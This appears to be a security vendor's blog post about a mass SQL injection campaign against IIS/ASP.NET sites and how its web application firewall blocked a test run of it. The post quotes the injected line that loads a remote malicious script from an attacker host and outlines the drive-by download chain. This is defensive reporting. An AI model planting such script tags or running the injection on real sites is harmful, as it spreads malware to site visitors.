Earlier last week, as reported by the SUCURI blog - the web was hit with an interesting Malware Injection originating in a “robint.us/u.js” deadly script that was injected into various applications. A search shows 114,000 results for infected web pages, which validates the attack as (unfortunately) successful.
The attack addressed specific functions that coexist when an application is hosted by an IIS web server hosting an ASP.NET application. With today's advanced and automated hacking techniques (Google Dorks, scripting, anonymous proxies and others) any such vulnerability can unfortunately be spread rapidly and effectively over a short period of time, causing major damage.
We decided to take this attack for a trial and attack one of our very own systems (yes, we do that!) and having our SecureSphere product deal with it. The result? SecureSphere caught this attack vector, rendering it useless, making our WAF customer base safe.
How did it look? From SecureSphere’s Alert we learn that our default security policies were able to catch on this attack attempt and effectively block it.
- The attack begins as an SQL Injection on a parameter over an ASP.NET web page, exploiting a known insecure function in the database. The encoded payload is then decoded into - <script src=hxxp://ww.robint.us/u.js></script> and kept in the database (and thus is persistent).
- A user then surfs to a web page that invokes this script and executes on the client side, which downloads a malware ( see http://www.sophos.com/blogs/sophoslabs/?p=9941 for more detail
- Attacker wins!